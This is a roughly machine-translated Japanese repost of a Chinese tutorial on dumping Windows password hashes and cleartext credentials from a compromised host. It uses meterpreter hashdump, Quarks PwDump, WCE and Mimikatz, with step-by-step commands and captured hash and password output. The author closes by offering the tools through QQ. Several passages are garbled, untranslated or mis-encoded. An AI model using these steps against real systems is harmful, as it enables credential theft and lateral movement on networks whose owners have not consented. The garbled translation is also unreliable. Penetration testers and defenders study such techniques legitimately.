Windowsシステムのハッシュ値をキャプチャするさまざまな姿勢

序文

ここでキャプチャーされるシステムはすべて03システムです。

パスワードを取得するハッシュダンプ

ターゲットマシンからハッシュ値を抽出し、ハッシュ値をクラックしてアカウントパスワードを取得します。コンピューター内の各アカウント(ドメインサーバーの場合はドメイン内の各アカウント)のユーザー名とパスワードは、samファイルに格納されます。実行中、ファイルはすべてのアカウントをロックします。アクセスするには、システムレベルのアカウントが必要です。したがって、このコマンドを使用するには、特権を増やす必要があります
。シェルプロンプトでhashdumpコマンドを入力して、ターゲットマシンのsamデータベースにハッシュをエクスポートします


meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1007:4274ebc980bc50aed4a6c053eb6761b1:326f3aae7bd9312f6b32afafec858d53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:ae694413fb708add0aa8b1b47358ce92:::

別のモジュールsmart_hashdumpはより強力で、ドメイン内のすべてのユーザーのハッシュをエクスポートできます。そのワークフローは次のとおりです。

 - 检查meterpreter会话的权限和目标机操作系统类型
 - 检查目标机是否为域控制服务器
 - 首先尝试从注册机中读取hash不行再尝试注入LSASS进程

取得したハッシュは、暴力やレインボーテーブルで解読できます。http://www.cmd5.com/

Quarks PwDumpキャプチャパスワード

win32環境でシステム認証情報をエクスポートするためのツール。サポートされているオペレーティングシステムは、xp、03、win7、win8、2008などです。Windowsパスワードシステムでは、パスワードは暗号化されたsamファイルに保存され、アカウントはログインします。パスワードの暗号文と平文はシステムのメモリに保存され、通常の状態では読み取ることができませんが、Qpでは読み取ることができます。

直接运行Quarks PwDump.exe
-dhl:导出本地哈希值
-dhdc:导出内存中的域控哈希值
-dhd:导出域控哈希值,必须指定NTDS文件
-db:导出Bitlocker信息,必须指定NTDS文件
-nt:导出NTDS文件
-hist:导出历史信息,可选项
-t:可选导出类型,默认导出JOhn类型
-o:导出文件到本地

ここに画像の説明を挿入
ここで、このツールを使用してハッシュ値を取得してエクスポートします。ローカルハッシュ値を現在のディレクトリの1.txtにエクスポートするコマンドを入力できます

QuarksPwDump.exe --dump-hash-local --output 1.txt

ここに画像の説明を挿入

Windows資格情報エディターのグラブパスワード

Windows資格情報エディター(WCE)は、強力なWindowsプラットフォームイントラネット侵入ツールであり、ログインセッションを列挙し、関連する資格情報(LM / NTHashなど)を追加、変更、削除できます。これらの関数は、イントラネット浸透で使用できます。たとえば、Windowsプラットフォームでのハッシュ操作を回避したり、メモリからNT / LMハッシュを取得したり(インタラクティブログイン、サービス、リモートデスクトップ接続からも利用可能)さらなる攻撃は、サイズも非常に小さく、イントラネットへの侵入に不可欠なツールです。ただし、管理者権限で使用する必要があり、ウイルス対策ツールに注意を払う必要があります。
まずアップロードコマンドを入力してwce.exeをターゲットホストのCドライブにアップロードし、次にターゲットマシンのシェルの下でwce-wコマンドを入力すると、システム管理者のパスワードが正常に抽出されます。

meterpreter > upload /root/wce.exe C:\Documents and Settings\Administrator\桌面\wce_v1_3beta>

デフォルトの使用-|コマンドでデータ形式を読み取るusername:domain:Im:ntlm(この種類の読み取りは、samデータベースの情報を読み取るのではなく、メモリからログイン情報を読み取ることです)、デフォルトの読み取り方法が最初です安全な方法で読み取り、読み取りに失敗した場合は安全でない方法を使用してください。システムに損傷を与える可能性があります。安全な読み取り方法を強制するには、-fパラメータを使用することをお勧めします。-gパラメーターは、パスワードを計算するために使用されます。これは、システムが暗号文を計算するために使用する暗号化方式を定式化するためです。-cパラメーターは、cmdを実行するセッションを指定するために使用され、-vパラメーターは、詳細情報を表示するために使用されるため、luid情報を表示できます。 、-Wパラメータは最も重要であり、ログインしたクリアテキストのパスワードを表示するために使用されます

-c参数用于指定会话来执行cmd
-v参数用于显示详细信息
-w用于查看已经登陆的明文密码
-l读取从内存中已经登陆的信息
-f强制使用安全的方式读取
-g用来计算密码

ここに画像の説明を挿入

Mimikatzキャプチャパスワード

Mimikatzは、フランスの専門家Benjamin Delpy(@gentilkiwi)によって作成された軽量デバッガです。侵入後のテストツールとして、セキュリティテスターがシステムパスワードを簡単に取得できるようにします。また、バイパスするために取得できるKerberosログイン資格情報も含まれていますこれは、RestrictedAdminモードのWindows 8またはWindows Server 2012のリモートターミナル(RDP)などの機能をサポートします。初期の侵入段階の後、ほとんどの場合、攻撃者はコンピュータ/ネットワークでより強固な足場を築きたいと思うかもしれません。そのためには、通常、一連の補足ツールが必要です。Mimikatzは、便利なタスクを一緒にバンドルしてみてください。このツールは、Windows 2000およびWindows XPシステムでは使用できません。Metasploitは、ユーザーがターゲットホストにソフトウェアをアップロードせずに使用できるMeterpreterスクリプトとして統合しています。Mimikatzは管理者権限で使用する必要があります。現時点では、一連の事前侵入を通じてターゲットマシンのMeterpreterシェルを正常に取得できたと想定します。

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

SYSTEM権限を取得したら、最初にターゲットマシンのアーキテクチャを確認します。Mimikatzは32ビットと64ビットの両方のWindowsアーキテクチャをサポートしていますが、サーバーが64ビットオペレーティングシステムの場合、Mimikatzを直接使用した後、Meterpreterはデフォルトで32ビットバージョンのMimikatzをメモリに読み込みます。これにより、64ビットオペレーティングシステムで多くの機能が無効になります。最初にシステムプロセスリストを表示してから、プロセスを64ビットプログラムプロセスに移行してから、Mimikatzを読み込んでシステムパスワードのプレーンテキストを表示する必要があります。32ビットオペレーティングシステムでは、このような制限はありません。ここにsysinfoコマンドを入力します

meterpreter > sysinfo
Computer        : WWW
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

mimikatzを直接ロードしてヘルプを表示

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.
    

mimikatzコマンドオプションを使用すると、Mimikatzのすべての機能を使用できます。使用可能なモジュールの完全なリストを取得するには、間違ったモジュールをロードする必要があります。

meterpreter > mimikatz_command -f a::
Module : 'a' introuvable

Modules disponibles : 
            	- Standard
      crypto	- Cryptographie et certificats
        hash	- Hash
      system	- Gestion syst�me
     process	- Manipulation des processus
      thread	- Manipulation des threads
     service	- Manipulation des services
   privilege	- Manipulation des privil�ges
      handle	- Manipulation des handles
 impersonate	- Manipulation tokens d'acc�s
     winmine	- Manipulation du d�mineur
 minesweeper	- Manipulation du d�mineur 7
       nogpo	- Anti-gpo et patchs divers
     samdump	- Dump de SAM
      inject	- Injecteur de librairies
          ts	- Terminal Server
      divers	- Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
    sekurlsa	- Dump des sessions courantes par providers LSASS
         efs	- Manipulations EFS

「:」構文を使用して、特定のモジュールで使用可能なオプションを要求できます。モジュールを選択した後、「:」を使用してこのモジュールのヘルプを表示することもできます。たとえば、ハッシュを表示するために使用可能なオプションは、Imおよびntlmです。

meterpreter > mimikatz_command -f hash::
Module : 'hash' identifi�, mais commande '' introuvable

Description du module : Hash
          lm	- Hash LanManager (LM) d'une cha�ne de caract�res
        ntlm	- Hash NT LanManger (NTLM) d'une cha�ne de caract�res

Mimikatzの一般的な使用法を理解した後、Metasploitの組み込みコマンドを使用するか、Mimikatzの組み込みコマンドを使用して、ターゲットマシンからハッシュとプレーンテキストの証明書をエクスポートできます。次に、msvコマンドを直接入力して、システムハッシュ値を取得します。

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;202037  NTLM       WWW           Administrator    lm{
    
     44efce164ab921caaad3b435b51404ee }, ntlm{
    
     32ed87bdb5fdc5e9cba88547376818d4 }
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  lm{
    
     aad3b435b51404eeaad3b435b51404ee }, ntlm{
    
     31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    n.s. (Credentials KO)
0;53201   NTLM                                      n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     WWW$             n.s. (Credentials KO)

kerberosコマンドを入力してシス​​テムチケットを取得する

meterpreter > kerberos 
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    
0;53201   NTLM                                      
0;999     NTLM       WORKGROUP     WWW$             
0;202037  NTLM       WWW           Administrator    123456

wdigestコマンドを入力して、システムアカウント情報を取得します

meterpreter > wdigest 
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User             Password
------    -------    ------        ----             --------
0;996     Negotiate  NT AUTHORITY  NETWORK SERVICE  
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE    
0;53201   NTLM                                      
0;999     NTLM       WORKGROUP     WWW$             
0;202037  NTLM       WWW           Administrator    123456

次に、samdumpコマンドを入力してsamdumpの使用可能なオプションを表示し、次にmimikatz_command -f samdump :: hashesコマンドを入力してハッシュを取得します。

mimikatz_command -f samdump:: 

ハッシュを取得することに加えて、Mimikatzには、ハンドルモジュールの使用、リスト/キルプロセス、ユーザートークンのシミュレーションなど、他の多くの機能があります。

ここにツールが必要です

シンプルで充実した1日です。ツールが必要な人は、私を追加したり、プライベートにチャットしたりできます。
QQ:3075999532
公開番号:
ここに画像の説明を挿入

おすすめ

転載: blog.csdn.net/p_utao/article/details/108504346